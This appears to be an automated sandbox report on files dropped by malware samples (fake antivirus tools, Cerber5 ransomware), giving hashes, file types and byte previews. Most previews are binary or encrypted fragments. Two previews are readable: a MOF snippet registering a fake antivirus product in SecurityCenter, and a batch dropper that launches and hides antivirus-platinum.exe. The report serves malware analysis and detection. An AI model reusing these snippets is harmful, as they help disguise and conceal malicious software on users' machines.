                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13340
                                                                                                                                                Entropy (8bit):2.697392409527333
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:kiZYWfx3rADYRZYBWQxcH8+YEZIOtFiKGfw+ra8wyiwzDwqalbVju8cI0v3:hZDUIM/tiwXalbhu8b0v3
                                                                                                                                                MD5:0B9489DA6BB228D58AAA60D53BB63735
                                                                                                                                                SHA1:B50DAB0B26D676F85AE6122F7DDDC089D2D38A8B
                                                                                                                                                SHA-256:36EA22B1D665189CE38F601E8D8E8EF4F1AE551C0098FEF7F6CABD17D4BEB1C3
                                                                                                                                                SHA-512:730ADF10D7CBA887C064AFA656A8C620AD56F7A053501EC8383DDC08FECE46BB2906278006A90D32F7326F188F6DDDE5B51D2C049C78D51804EC9DD098B6E5B4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):52932
                                                                                                                                                Entropy (8bit):3.073919814455611
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:fTHT4xUbPkQz1YRHLBvnpInm+/d/LJ7NykJea:fTHT4xUbPkQz1YRHLeNykJea
                                                                                                                                                MD5:2857ADACDBCDF1AF1B1BE37463FD5D1F
                                                                                                                                                SHA1:5171C065EED5FE584DE54742160872F6ACC899F1
                                                                                                                                                SHA-256:DB7FBFC75629CD92D45A58B5D8164F579B42D9382A11F9D74747888DEAEFA32E
                                                                                                                                                SHA-512:55BD44172AB24194CFCD09B4F9801B15607163E8C4C3C1377FC3022B7AE2C17C519EEC932FC80FC69EAC688A719DF6B866365474FFC5CA3C3EFAC1AC1B7EB95A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):172648
                                                                                                                                                Entropy (8bit):7.623689262295841
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:sqp6y91BH91Be/MbNBQ3MypF06N25xOT5Ng2WV4:Oy/BH/Be00Mypk5sYp4
                                                                                                                                                MD5:87E4959FEFEC297EBBF42DE79B5C88F6
                                                                                                                                                SHA1:EBA50D6B266B527025CD624003799BDDA9A6BC86
                                                                                                                                                SHA-256:4F0033E811FE2497B38F0D45DF958829D01933EBE7D331079EEFC8E38FBEAA61
                                                                                                                                                SHA-512:232FEDEC0180E85560A226870A244A22F54CA130ED6D6DC95DC02A1FF85F17DA396925C9FF27D522067A30EE3E74A38ADFF375D8752161EE629DF14F39CF6BA9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 60%
                                                                                                                                                • Antivirus: Metadefender, Detection: 52%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@z.T.................|............... ........@.. ..............................p.....@.....................................W.......P...............h...........l................................................ ............... ..H............text....z... ...|.................. ..`.rsrc...P............~..............@..@.reloc..............................@..B........................H.......hO...I......,....L..............................................6.(.....(....*...0............(.....r...p.r...p....(....-5~....r...p.o......r...pr...p(....o....r...p(....o.....r&..p(....(...., r:..pr...p(....&r...p(....&(....*.*.*.*.0..........s......o.....( ...*z.,..{....,..{....o!.....("...*...0..^............(#...s$.....s%...}.....s&...}.....s'...}.....s(...}.....s(...}.....s(...}.....s(...}.....s(...}.....s(...}.....{....o)....(*....{.....r...po+...t7...o,....{...
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:CSV text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):847
                                                                                                                                                Entropy (8bit):5.350326386662965
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKEYHKGD8AoPtHTG1hAHKKPz
                                                                                                                                                MD5:8695FFB03DE68402BA23CADD1D71EF14
                                                                                                                                                SHA1:67BBF40D11F0B1841FEE4F622E07855787065E0B
                                                                                                                                                SHA-256:1F0942A2EECF4990E027C7D609E319ADCF4563F984DD0D8EF2B370A1817F3C1C
                                                                                                                                                SHA-512:6EDEEAB5EF14473DF54251D69A3E2B7AC29778AEF929F8EC05F03008BF9AD629FE315115B22EDC09E92E1D7F2869CF9D4DDC6DB92C4158E92F80DEDA5A365098
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@Antivirus.exe
                                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):443
                                                                                                                                                Entropy (8bit):5.130314528868292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:jNpKiB8l5hNffFGWIylPZg4GKV7F0NbW7GitW74Id4YbJ:PB8vhFfk0lPS4GK9F6b/UcW2J
                                                                                                                                                MD5:7FAD92AFDA308DCA8ACFC6FF45C80C24
                                                                                                                                                SHA1:A7FA35E7F90F772FC943C2E940737A48B654C295
                                                                                                                                                SHA-256:76E19416EB826A27BDCF626C3877CF7812BBE9B62CC2CCC5C2F65461D644246F
                                                                                                                                                SHA-512:49EED1E1197401CB856064BF7FDBD9F3BC57F3C864D47F509346D44EED3B54757D8C6CDB6254990D21291065F0762D2A1588D09E43C5728F77A420F6A8DCD6EA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:// Load the MOF in Root\SecurityCenter namespace..#pragma namespace("\\\\.\\Root\\SecurityCenter")..// Create the class..// No properties are specified..// so the class will have only system properties..instance of AntiVirusProduct..{.. instanceGuid = "{28e00e3b-806e-4533-925c-f4c3d79514b9}";.. companyName = "Antivirus";.. displayName = "Antivirus";.. onAccessScanningEnabled = true;.. productUptoDate = false;.. versionNumber = "1.0";..};..
                                                                                                                                                Process:C:\Windows\302746537.exe
                                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):348
                                                                                                                                                Entropy (8bit):4.746239451096403
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:hWcyRlRoLUX/CQrRjzHJ//1zBDRv7YUK1R7Y77hG7Y7nrn:wn7VFXfrv+7Q7gQr
                                                                                                                                                MD5:7D8BEB22DFCFACBBC2609F88A41C1458
                                                                                                                                                SHA1:52EC2B10489736B963D39A9F84B66BAFBF15685F
                                                                                                                                                SHA-256:4AA9ED4B38514F117E6E4F326CB0A1BE7F7B96199E21305E2BD6DCE289D7BAA2
                                                                                                                                                SHA-512:A26CF9168CF7450435A9FE8942445511F6FDA1087DB52BD73E335D6F5B544FC892999019D9291D9DCC60C3656DE49688F6D63282C97706E2DB286F988E44FD94
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:@echo off..title LOAD..:1..if not exist c:\windows\comctl32.ocx goto 1..regsvr32 /s c:\windows\comctl32.ocx..:2..if not exist c:\windows\mscomctl.ocx goto 2..regsvr32 /s c:\windows\mscomctl.ocx..:3..if not exist c:\windows\antivirus-platinum.exe goto 3..start c:\windows\antivirus-platinum.exe..attrib +h c:\windows\antivirus-platinum.exe..exit....
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                File Type:ASCII text, with very long lines (344), with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):344
                                                                                                                                                Entropy (8bit):5.876706941835139
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:mha/b/uv6OQIEPlA84adTPEIIQG3p2ujhxuXRIu6+EEmjCf3K:msT/CPwa8HtopJzu+u2E36
                                                                                                                                                MD5:E4EE0CB25F62526D92F4BEB74FC11F7F
                                                                                                                                                SHA1:8E9C905DEB9E8AD7020FF15A053F316729E06F32
                                                                                                                                                SHA-256:3ABB0157325818DF7E66852936E4B6235ED4FFCFE14D010099C22EEEB37D0E9D
                                                                                                                                                SHA-512:373FD744E5E03ADABE2CD9DC061B4DAEC8AC8D1B13D2E589B375DF3FE730638310569FDC0C8AD140D3A693EF997826E8BB285E817562C19F88DBB5ECE16CF893
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:iLvlodXvsbdDVJKmNUv0PCN+ZCajvJo6rUMtS/tCeIitOiHzB64e+/U3XfwRGHSU8xjejVayBdopxuIkZeoua3Eic2+XQUyslD6WUjw5u5scOhrQeqb3Q1X5+jCJClNmNuD03RCb+OrHz3FGzHE8Olf6wzCgjanypdxyu+3XKZWFJcTDVzmMwHUIIwyc76p9KrnaPtQdDT+hDhsU2+90UNpLxMf0a1rSniHm6m+btSpKP5VcQJ8Mvi1IPFQRJbJl4sHmPqDRQhrK8EdhF9HsPdfhagUzo76YFN51lNupiNdhQhNfUYks7XihM+V2FC9dbQyDQGVY9fY1c4TRxK0W3Q==
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                File Type:b.out executable 386
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):130
                                                                                                                                                Entropy (8bit):6.3817200244504235
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Tlp32CG8B+EC0GQE1m1trOwQubN76k4ovperGn:mCG8B+E2PEpQUNekbvwS
                                                                                                                                                MD5:C708E4F9343026E1B87F5841DFCB6011
                                                                                                                                                SHA1:CA6AC97634E206AA942F38EA3581C1B926919D36
                                                                                                                                                SHA-256:2892B91D9E12D9A03A36825FF60B1F7E48877014290992A444185A698C138CA1
                                                                                                                                                SHA-512:A96D35538E9F77D75A5D2E5A790A88E0A937A1C0EF0E8BE6CE5CC51EA4641E8EE808BFBEF074F152EDFE5A06D968D71C4317F885E8D47B35181E8AB978898D74
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........RSA1p................x..9.("..y+.....~.0a$.k...*...e....!.I..Ry'<.{j.N...+.r..:.....N~(1..kLA...^...f.D....X:.O....._IP.
                                                                                                                                                Process:C:\Windows\SysWOW64\wbem\mofcomp.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1018
                                                                                                                                                Entropy (8bit):3.589399567854101
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:QkOumARzPocUWbcJJRCsWnOPYbS/BJylWjPLqj6:QEhzwYgCsxRJySO6
                                                                                                                                                MD5:072B14D3D9DFD5D0A6AD080E8C7CB419
                                                                                                                                                SHA1:BE4940D8BD17BC65EC9F2BBA453881B837D9588F
                                                                                                                                                SHA-256:DC309B34CE1C52E5CD78B62DB56741B4ACB21E926B7B899F0B6374DCC2A3BC38
                                                                                                                                                SHA-512:5B7443545220F9A338B5E92FC462B0624E9EC14EBD3F0304E1954DA4CD7D0F89AEE8C47FCBDFA3CFB068EDC222E230676BD9C1CF31D84061642049F59930BDBD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:#.l.i.n.e. .1. .".C.:.\.\.U.s.e.r.s.\.\.a.l.f.o.n.s.\.\.A.p.p.D.a.t.a.\.\.L.o.c.a.l.\.\.T.e.m.p.\.\.4.o.t.j.e.s.j.t.y...m.o.f."....././. .L.o.a.d. .t.h.e. .M.O.F. .i.n. .R.o.o.t.\.S.e.c.u.r.i.t.y.C.e.n.t.e.r. .n.a.m.e.s.p.a.c.e.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.R.o.o.t.\.\.S.e.c.u.r.i.t.y.C.e.n.t.e.r.".)....././. .C.r.e.a.t.e. .t.h.e. .c.l.a.s.s....././. .N.o. .p.r.o.p.e.r.t.i.e.s. .a.r.e. .s.p.e.c.i.f.i.e.d....././. .s.o. .t.h.e. .c.l.a.s.s. .w.i.l.l. .h.a.v.e. .o.n.l.y. .s.y.s.t.e.m. .p.r.o.p.e.r.t.i.e.s.....i.n.s.t.a.n.c.e. .o.f. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t.....{..... .i.n.s.t.a.n.c.e.G.u.i.d. .=. .".{.2.8.e.0.0.e.3.b.-.8.0.6.e.-.4.5.3.3.-.9.2.5.c.-.f.4.c.3.d.7.9.5.1.4.b.9.}.".;..... .c.o.m.p.a.n.y.N.a.m.e. .=. .".A.n.t.i.v.i.r.u.s.".;..... .d.i.s.p.l.a.y.N.a.m.e. .=. .".A.n.t.i.v.i.r.u.s.".;..... .o.n.A.c.c.e.s.s.S.c.a.n.n.i.n.g.E.n.a.b.l.e.d. .=. .t.r.u.e.;..... .p.r.o.d.u.c.t.U.p.t.o.D.a.t.e. .=. .f.a.l.s.e.;..... .v.e.r.s.i.o.n.N.u.m.b.e.r. .=. .".1...
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe
                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):333007
                                                                                                                                                Entropy (8bit):7.760227808094329
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:Kuw0sRI520bSuw0sRI520bwRw0sRI520bzow0sRI520bwuwisRI520bwuw0sRI5A:JoRQFxoRQFQoRQF8oRQFX6RQFXoRQF+
                                                                                                                                                MD5:E8974CB2C9F4934320B98A225E0E6BF5
                                                                                                                                                SHA1:D4753AB3B9411C34790C6491806B4993AA6E3EDD
                                                                                                                                                SHA-256:D901E4D553B06339AC829F532FFB16885481EA04710EC54076C48F3BDCD7D18B
                                                                                                                                                SHA-512:A3AC3BBB02A75417156690994CF3D486FD2414DB634C62AFD83BD0BE01A99A3DCD32EDFD7C5AC567AAACD6D02BBFC67EEFE829293B5B36429BE92F2E1FAA4653
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:......................>.......................................................}.......v.......~...................................................................................................................................................................................................................................................................................................................................................................................................................................E...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1178406
                                                                                                                                                Entropy (8bit):7.999833834152535
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:lKTP6/tHWoQQRakFbfVKqycdGiazlXVyQ8MiSIxjlTGPje9V4iuquGGspoLA:lK4WDQRaklfVKJcd7MXVlPiZlTejkV42
                                                                                                                                                MD5:9A38C29FF9E12BA2892381EB51C79934
                                                                                                                                                SHA1:76FCF6BCAAC32F624FA0154A9177E44469B5886A
                                                                                                                                                SHA-256:45B75A116AA3B07F90A7C2D9A83C2CDE524797DF88BB5E20F9DC1E74D8527861
                                                                                                                                                SHA-512:C26D8C252D6F18A2AE4419BBFE27099862A625CBC40D8F104FA20CB361DA112EBE6A17935AC3613C24B58F9C291D2219E55F59E0FA40B81F92FCCF190115E734
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c..\.<....X...Z.......Endermanch@AnViPC2009.exe......AE.........-4x5...B.....]..<..}./a..(.q\.{|0....<.{..._..:.....C:.....<R..\]..x.e.S*.AM.2.....!....T..y..u..2._p.N.....Sr..../1..o.2....&..U.D...z%..I..Rn..r.0.........m.,`.Q.......<..6..EB..v7f.,X..x..)1.-"............{...<..>....%|.C...dID...hR.OD.....w.<@..C...6....U;W$..e.....q..!.,.Y;.>.'K...C..Y.J.Q..h.~..f...3...D..C....1.PG..E..%...#-T.<.B..:X...>.SF..2x.S......z..5....1]....c...h.....]....:.WWL...RWV.;.=..?.....S..Of...'......oa..%........8AQ.y...p...X/x.2g._.V.6.fL.~......:..x...........tB.V~..0.v.....uO3..............$.Z...n.b-..P*:$......U.....U.B...O..}..L....3.n..@.......nz.q'.l...z_....e..l.6....{.....>...|%6..;..}o..p[..X.....}..Z.(..7J......l...kb...rHib......1.*...*..m..,.1.p,..FM]AaE....P.+..*M...`XhK.s87P.2Hc.....*.......PY.m.x:OO......&~#..@...}J..B.uq.\.v.fE.p....(.G\!.. X..0....I...Y..mw.Bg.\.R..K..vV.C..lT.wT...o2...Y"(M..,.}.k...@b.8.(.%..K...YT.34[o|.[.
                                                                                                                                                Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Sep 29 20:52:10 2022, mtime=Thu Sep 29 20:52:10 2022, atime=Sat Jan 16 20:57:50 2010, length=22528, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1700
                                                                                                                                                Entropy (8bit):3.0727664040170746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:8ZmVPTlwsYyALOp+cWeKec4of2bW7aB6m:8ePp8RLO+9kofEfB6
                                                                                                                                                MD5:E481E1C1043CE501186BFC3479D5AEB7
                                                                                                                                                SHA1:DE95917E2657EFC655613B7350DC676CF52DB06B
                                                                                                                                                SHA-256:4DE7FA6C1A436691D929A068ABB8E43976E5E29B168693D4394BE01740D4A3FC
                                                                                                                                                SHA-512:03B7A5812A71B61BA154ACBEBA366599BFCAAEA8A1EF258D0554C77AF9B858D1AA39759A1B12ECBAEF2966CA5994846ABDF56F28635DCE50C8CCEA890C09D394
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:L..................F.@.. ...%..M....V.M............X...........................P.O. .:i.....+00.../C:\...................V.1......U...Windows.@......L..=U]............................g..W.i.n.d.o.w.s.....h.2..X..0<9. .302746~1.EXE..L......=U..=U...............................3.0.2.7.4.6.5.3.7...e.x.e.......G...............-.......F...........k[{......C:\Windows\302746537.exe....A.n.t.i.V.i.r.u.s. .P.l.a.t.i.n.u.m.......\.....\.....\.W.i.n.d.o.w.s.\.3.0.2.7.4.6.5.3.7...e.x.e...C.:.\.W.I.N.D.O.W.S...C.:.\.W.I.N.D.O.W.S.\.3.0.2.7.4.6.5.3.7...e.x.e.........%SystemRoot%\302746537.exe..........................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.3.0.2.7.4.6.5.3.7...e.x.e...........................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):716432
                                                                                                                                                Entropy (8bit):7.999718752172075
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:pKAT6gPoHT7CzZy7fmzVyaF3zA0mKz8doC3m/LuXCC32H+REYWzTdjhoMlX1Q4QM:2gPoHT7CtEfwyaFDAjKz8Bm/LYC+3uYi
                                                                                                                                                MD5:FF84853A0F564152BD0B98D3FA63E695
                                                                                                                                                SHA1:47D628D279DE8A0D47534F93FA5B046BB7F4C991
                                                                                                                                                SHA-256:3AAA9E8EA7C213575FD3AC4EC004629B4EDE0DE06E243F6AAD3CF2403E65D3F2
                                                                                                                                                SHA-512:9EA41FE0652832E25FE558C6D97E9F9F85CCD8A5F4D00DBCC1525A20A953FBD76EFB64D69CE0FDD53C2747159D68FCB4AC0FA340E0253B5401AEBC7FB3774FEB
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........P><..(........ ...Endermanch@AntivirusPlatinum.exe#.J...3.....f.........r.......G2[X...4......1|...(.....ZG4..X...I..v......Aa.54.yE....MhG..'..e`......&....TXA\........"{5....UqD.i.H........f......@y".}{.....u.....%.V/t..+.=.A1.A.C.T......O..c..2..+....2C64.....f>a...#.\b.4Z._.)....II0.....{n......6x.[.......#O#.... ....jY..*...S..q1. ..7.....`.......IA....v..K.7.'..TXI....l.....vP#.;x.'z.......geZ.z..J..R.AV....U.8`.Zy...a.i.$L....x...9..w..:..4.c........>.a.P`.A. ...8g.=A.....u..#..V.uz.7.".6.G..kv.....p.<.L0.VZpw......?.:...E.v.Vt.c.6..e.Vw[.+.......].%..RSFN....._.%.$.m.{....n....E,7...S.!.....!...;.nH..MQ..5.............zA.....h....P..M..@..[....C..hYN.pF3O=.Kb.j.V...z.i..>YE.q....V~V.g.....7.._Ucwn=]..8.!..>[&.q.98.....y......x..d.l..... '.k.Z..f......XrpMf.y.p....97./...=5../.#.<.>h@..e............K.6.\...>...~.........q{......6...'.{".U..90.oI..zO........%.-..4.kK...D...3...]S.K(.O......).....a...cutT..<.......f.v..8.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):813771
                                                                                                                                                Entropy (8bit):7.999770789356288
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:5AKFQL3t2IUmZwXlgqEKUhHgQeX8k22QO:auQLQ6wmqESzPQO
                                                                                                                                                MD5:AB1187F7C6AC5A5D9C45020C8B7492FE
                                                                                                                                                SHA1:0D765ED785AC662AC13FB9428840911FB0CB3C8F
                                                                                                                                                SHA-256:8203F1DE1FA5AB346580681F6A4C405930D66E391FC8D2DA665AC515FD9C430A
                                                                                                                                                SHA-512:BBC6594001A2802ED654FE730211C75178B0910C2D1E657399DE75A95E9CE28A87B38611E30642BAEAE6E110825599E182D40F8E940156607A40F4BAA8AEDDF2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
